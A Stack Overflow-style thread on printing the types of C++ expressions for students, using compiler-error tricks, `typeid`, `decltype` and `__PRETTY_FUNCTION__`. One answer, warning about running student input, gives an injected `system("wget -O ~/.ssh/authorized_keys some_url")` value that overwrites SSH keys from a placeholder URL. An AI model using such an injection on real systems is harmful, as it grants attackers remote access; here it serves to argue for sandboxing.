# Print types of arbitrary C++ expressions

Tags: c++

I'm interested in writing a tool for teaching purposes that evaluates C++ expressions and prints their types. Essentially, my thinking is that my students could type in any expression, and the program would echo back the type of the expression. Is there an existing tool that already does this? If not, is there a pretty easy way to do it by integrating with an existing compiler and calling into its debugger or API? I've been told, for example, that Clang has a fairly complete compiler API, perhaps there's some way to just pass a string into Clang along with the appropriate include directives and have it spit out a type?

I realize that this is potentially a huge project if there's nothing close to this existing today. I just thought it would have significant educational value, so it seemed like it was worth checking.

Comment: You'd basically have to write an interactive C++ CLI interface. (Not to be confused with a C++/CLI interface, of course :-) .)

Comment: [`cint`](http://root.cern.ch/drupal/content/cint) may help, although it's not so standard-compliant (actually, I hate it for several reasons).

Answer (score 10, accepted):

I came up with an answer inspired by Ben Voigt's comments. Just make a bug and let the compiler tell you the type which caused it:

```
template <typename T> void foo(T); // No definition

int main() {
  foo(1 + 3.0);
}
```

[Result:](http://ideone.com/aNUWu)

```
In function `main':
prog.cpp:(.text+0x13): undefined reference to `void foo<double>(double)'
```

Also, since you execute nothing but the compiler, you're pretty safe. No sandboxing needed, really. If you get anything other than "undefined reference to `void foo<T>(T)`", it wasn't an expression.

[edit] How would you put this into a tool? Simple, with macro's

```
// TestHarness.cpp
// Slight variation to make it a compile error
template <typename T> void foo(T) { typename T::bar t = T::bar ; }

int main() {
  foo(EXPR);
}
```

Now compile with `$(CC) /D=(EXPR) TestHarness.cpp`. Saves you from rebuilding the input file every time.

Comment: The error comes from the linker, not compiler, but this is brilliant!  +1  I think you might be able to get the compile step to fail instead, by making the template a private member function.

Comment: Yeah, eliminating the linker is potentially even faster. I came up with this: http://ideone.com/Yu0nx . An error that's type-dependent will be detected in phase 2 name lookup, and therefore have the expression type in the error message (on reasonable compilers).

Comment: You can supply the source code to `g++` on stdin, no source file is needed, nor a macro.  autotools (automake, autoconf) uses this technique extensively.

Answer (score 3):

Improving yet more on [MSalter's improvement](https://stackoverflow.com/questions/7601533/print-types-of-arbitrary-c-expressions/7616355#7616355):

```
class X {
  template <typename T> static void foo(T) {}
};

int main() {
  X::foo( $user_code );
}
```

Result (with `$user_code = "1 + 3.0"`):

```
prog.cpp: In function ‘int main()’:
prog.cpp:2: error: ‘static void X::foo(T) [with T = double]’ is private
prog.cpp:6: error: within this context
```

This avoids the link step.

---

Original answer:

C++ has the `typeid` keyword.  Conceptually, you just need to stick the user's expression into some boilerplate like:

```
extern "C" int puts(const char *s);
#include <typeinfo>

int main(void)
{
    const type_info& the_type = typeid( $user_code );
    puts(the_type.name());
}
```

And then pass that source file to the compiler, and run it to get the answer.

Practically, it's going to be difficult to avoid running malicious code.  You'd need to use a sandbox of some type.  Or be really really careful to make sure that there aren't mismatched parentheses (you do know what trigraphs are, right?).

> yes I'm aware that the argument of `typeid` isn't evaluated.  But let `$usercode` be  `1); system("wget -O ~/.ssh/authorized_keys some_url"` !

A better option would be to avoid running the program.  With a framework (requires C++11) like:

```
extern "C" decltype( $user_code )* the_value = 0;
```

You could run the compiler with the option to generate debug data, then use e.g. a dwarf2 reader library and get the symbolic type information associated with `the_value`, then remove one level of pointer.

Comment: Pretty sure that's not what the OP wants. He says he wants to "read an expression interactively and print its type".

Comment: You need to include the `typeinfo` header for that, and the operator’s name is `typeid`, not `typeof`.

Comment: typeid does not evaluate it's arguments.  If you have as many ) as (, then you should be fine.

Comment: @KerrekSB: If he's crafty, he can have a program that writes BenVoight's program, then calls the compiler, then runs it and displays the results :D

Comment: @MooingDuck: Yes, as I said, you basically have to write an interactive C++ interpreter.

Comment: @KerrekSB: You are so right about `typeid` (why does every language have to pick a different name for the same thing?).

Comment: @KerrekSB: No interpreter needed.  If your compiler is reasonably fast (and on this small file it should be), then you can go through a compile/execute cycle for each new expression, and still be "interactive".

Comment: @BenVoigt: Hm, yes, something along those lines. Not sure how well a compiler could compile "incrementally", I guess.

Comment: For this interactive case, the compilation overhead imposed by `<iostream>` would be quite significant. I'd even suggest `fputs()`.

Comment: @MSalters: That's a great point.  I often think about the runtime overhead of iostreams, which would be trivial here, but the compile-time cost IS likely non-trivial.  I'll update my answer.  Prototyping the function directly should be faster yet than including a standard C header.

Comment: @Ben: Smart idea, but you stopped a bit too early. Compilers can perfectly well output that information themselves, if you poke them where it hurts ;) See my answer.

Answer (score 0):

Here's one way you can do this in GCC and Clang with `__PRETTY_FUNCTION__`:

```
#include <iostream>
#include <iterator>
#include <cstring>
#include <string_view>
#include <vector>

template<typename T>
static constexpr auto type_name() noexcept {
    // __PRETTY_FUNCTION__ means "$FUNCTION_SIGNATURE [with T = $TYPE]"
    const auto * const begin = std::strchr(__PRETTY_FUNCTION__, '=') + 2; // +2 to skip "= "
    const auto size = static_cast<std::string_view::size_type>(std::cend(__PRETTY_FUNCTION__) - begin - 2); // -2 meaning up to "]\0"
    return std::string_view{ begin, size };
}


template <typename T1, typename T2>
class my_class { }; // Example Class

int main() {
    my_class<int&, std::vector<double>> my_arr[20];
    std::cout << type_name<decltype(my_arr)>();
}
```

[Output on GCC](https://gcc.godbolt.org/z/V-zQVp):

```
my_class<int&, std::vector<double> > [20]
```

Comment: That's not what OP asked. OP wants to _dynamically_ receive a C++ expression from the user, parse it and print the type. That has nothing to do with `constexpr` work.

Comment: @einpoklum *"Essentially, my thinking is that my students could type in any expression, and the program would echo back the type of the expression."* Students could copy the expression like `std::cout << type_name<decltype(MY_EXPRESSION)>();` and get the type.

Comment: @einpoklum It's a place holder for an actual expression like `"Hello World";`. It's not a preprocessor definition.

Answer (score 0):

> I'm interested in writing a tool for teaching purposes that evaluates C++ expressions and prints their types. Essentially, my thinking is that my students could type in any expression, and the program would echo back the type of the expression. Is there an existing tool that already does this?

These days, there sort of is such a tool - online. It only does what you want as an unintended by product though. I'm talking about Matt Godbolt's [Compiler Explorer](https://godbolt.org/).

Your "program" will look like this:

```
#define EXPRESSION 123

template <typename T> class the_type_of_EXPRESSION_IS_ { };
using bar = typename the_type_of_EXPRESSION_IS_<decltype(EXPRESSION)>::_;
```

Now, if you replace `123` with a C++ expression, you'll [get](https://godbolt.org/z/SyQocg), in the compiler error messages section, the following:

```
<source>:4:72: error: '_' in 'class the_type_of_EXPRESSION_is_<int>' does not name a type

    4 | using bar = typename the_type_of_EXPRESSION_IS_<decltype(EXPRESSION)>::_;

      |                                                                        ^

Compiler returned: 1
```

The first line has your desired type, within the angle brackets.